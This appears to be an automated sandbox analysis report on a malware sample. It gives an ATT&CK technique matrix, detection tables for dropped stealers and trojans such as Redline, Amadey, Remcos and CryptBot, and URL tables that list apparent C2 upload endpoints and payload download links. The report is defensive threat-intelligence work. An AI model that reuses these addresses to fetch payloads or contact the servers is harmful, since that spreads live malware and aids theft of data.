Employee Names	Virtual Private Server	Local Accounts	1 Command and Scripting Interpreter	11 Scheduled Task/Job	21 Access Token Manipulation	1 Install Root Certificate	NTDS	168 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	11 Scheduled Task/Job	221 Registry Run Keys / Startup Folder	512 Process Injection	33 Software Packing	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Scheduled Task/Job	1 Timestomp	Cached Domain Credentials	371 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	221 Registry Run Keys / Startup Folder	1 DLL Side-Loading	DCSync	171 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	221 Masquerading	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	171 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	512 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
wfJfUGeGT3.exe	13%	ReversingLabs
wfJfUGeGT3.exe	14%	Virustotal	Browse
wfJfUGeGT3.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	100%	Avira	HEUR/AGEN.1319014
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	100%	Avira	TR/Spy.Gen
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	100%	Avira	TR/Crypt.XDR.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	100%	Avira	TR/Crypt.XDR.Gen
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	100%	Avira	HEUR/AGEN.1313066
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	100%	Avira	HEUR/AGEN.1313066
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	100%	Avira	HEUR/AGEN.1319014
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	100%	Avira	TR/Crypt.XDR.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	100%	Joe Sandbox ML
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	100%	Joe Sandbox ML
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	100%	Joe Sandbox ML
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	100%	Joe Sandbox ML
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	100%	Joe Sandbox ML
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.PureLogsStealer
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	84%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	88%	ReversingLabs	Win32.Trojan.Znyonm
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	84%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.PureLogsStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	88%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	100%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	96%	ReversingLabs	Win32.Spyware.Redline
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	82%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	71%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exe	92%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	75%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	87%	ReversingLabs	Win32.Trojan.Multiverze
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exe	88%	ReversingLabs	Win64.Trojan.Remcos
C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	82%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	88%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	92%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	88%	ReversingLabs	Win64.Trojan.Remcos
C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	96%	ReversingLabs	Win32.Spyware.Redline
C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	100%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	87%	ReversingLabs	Win32.Trojan.Multiverze
C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	71%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	75%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe	82%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	5%	ReversingLabs
C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	88%	ReversingLabs	Win32.Spyware.Multiverze
C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Windows.exe	84%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label	Link
http://crl.microsoft	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
https://aka.ms/nativeaot-compatibilityy	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://api.ip.s	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13Response	0%	URL Reputation	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	URL Reputation	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id3Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Responsex	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id12Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/rm	0%	URL Reputation	safe
http://thizx13vt.top/v	100%	Avira URL Cloud	malware
http://thizx13vt.top/v1/upload.phpIq	100%	Avira URL Cloud	malware
http://thizx13vt.top/g	100%	Avira URL Cloud	malware
thizx13vt.top	100%	Avira URL Cloud	malware
95.179.163.21:29257	0%	Avira URL Cloud	safe
http://thizx13vt.top/j	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id12Response	2%	Virustotal		Browse
https://www.dropbox.com/he	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15Responsex	1%	Virustotal		Browse
http://tempuri.org/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
https://www.dropbox.com/	0%	Avira URL Cloud	safe
http://tempuri.org/	1%	Virustotal		Browse
http://tempuri.org/Entity/Id2Response	2%	Virustotal		Browse
http://thizx13vt.top/x	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id10Responsex	0%	Avira URL Cloud	safe
thizx13vt.top	5%	Virustotal		Browse
https://fusionflow-meta.net:443/socket/.)	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13LRjq	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id6Responsex	0%	Avira URL Cloud	safe
95.179.163.21:29257	8%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
http://185.216.214.225/freedom.exe	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id13LRjq	2%	Virustotal		Browse
http://tempuri.org/Entity/Id15Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id6Responsex	2%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Virustotal		Browse
http://185.216.214.225/freedom.exe	21%	Virustotal		Browse
http://tempuri.org/Entity/Id1Responsex	0%	Avira URL Cloud	safe
https://www.dropbox.com/	1%	Virustotal		Browse
http://tempuri.org/Entity/Id3LRjq	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	0%	Avira URL Cloud	safe
http://thizx13vt.top/v1/upload.phpM?	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id21Response	4%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	0%	Virustotal		Browse
http://tempuri.org/Entity/Id3LRjq	2%	Virustotal		Browse
http://tempuri.org/Entity/Id23Responsex	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15Response	2%	Virustotal		Browse
http://tempuri.org/Entity/Id10Responsex	1%	Virustotal		Browse
https://fusionflow-meta.net:443/socket/3422	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id6LRjq(	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id20Responsex	0%	Avira URL Cloud	safe
http://thizx13vt.top:80/v1/upload.phpraz	100%	Avira URL Cloud	malware
https://direct-link.net/1218649/browse-and-buy-cs2-skins	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23Responsex	1%	Virustotal		Browse
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
https://pastebin.com/raw/fiLr6dSt	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id1Responsex	1%	Virustotal		Browse
http://tempuri.org/Entity/Id8Responsex	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	1%	Virustotal		Browse
https://fusionflow-meta.net/1G	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
http://tempuri.org/Entity/Id17LRjq	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id20Responsex	1%	Virustotal		Browse
https://direct-link.net/1218649/browse-and-buy-cs2-skins	0%	Virustotal		Browse
http://tempuri.org/Entity/Id3Responsex	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id6LRjq(	1%	Virustotal		Browse
http://thizx13vt.top/v1/upload.php%qN	100%	Avira URL Cloud	malware
http://thizx13vt.top/v1/upload.phpsrJG	100%	Avira URL Cloud	malware
http://pastebin.com	0%	Avira URL Cloud	safe
https://pastebin.com/raw/fiLr6dSt	1%	Virustotal		Browse
http://tempuri.org/Entity/Id12Responsex	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id3Responsex	2%	Virustotal		Browse
http://tempuri.org/Entity/Id17Responsex	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Responsex	1%	Virustotal		Browse
http://tempuri.org/Entity/Id5Response	0%	Avira URL Cloud	safe
https://aka.ms/nativeaot-compatibilityh	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id10Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Response	0%	Avira URL Cloud	safe
https://www.dropbox.com/scl/fi/rqsnrl6msilfirz1qp1pn/weetwegsdg.exe?rlkey=rmj9i20g87wwdvd6wsdaypie2&	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id17LRjq	2%	Virustotal		Browse
+#thizx13vt.top	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24LRjq	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
thizx13vt.top	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
95.179.163.21:29257	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
+#thizx13vt.top	true	Avira URL Cloud: safe	unknown
t.top	true	Avira URL Cloud: safe	unknown
exonic-hacks.com	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://thizx13vt.top/v	3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.microsoft	Cerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://thizx13vt.top/v1/upload.phpIq	3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id12Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://thizx13vt.top/g	3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://thizx13vt.top/j	3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/he	Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	RegAsm.exe, 0000002E.00000002.4755857564.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id21Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.dropbox.com/	Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3429372925.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://thizx13vt.top/x	3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id10Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fusionflow-meta.net:443/socket/.)	Cerker.exe, 0000001C.00000002.4585160635.0000000000DAA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4605809813.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id13LRjq	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id6Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://discord.com/api/v9/users/	InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.216.214.225/freedom.exe	Cerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4190412440.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	false	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id15Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id1Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	winmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id3LRjq	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://thizx13vt.top/v1/upload.phpM?	3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.autoitscript.com/autoit3/J	Shipment.pif, 0000000B.00000000.2048576959.0000000000A19000.00000002.00000001.01000000.00000006.sdmp, Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, GuardTrack.scr, 00000013.00000000.2074054599.0000000000679000.00000002.00000001.01000000.00000008.sdmp, GuardTrack.scr, 00000015.00000000.2161600759.0000000000679000.00000002.00000001.01000000.00000008.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ip.sb/ip	InstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, WIDeqOfZq9.exe.51.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id23Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fusionflow-meta.net:443/socket/3422	Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa03	GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6LRjq(	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityy	meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id20Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://thizx13vt.top:80/v1/upload.phpraz	3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://direct-link.net/1218649/browse-and-buy-cs2-skins	winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://pastebin.com/raw/fiLr6dSt	winmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id8Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fusionflow-meta.net/1G	Cerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id17LRjq	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
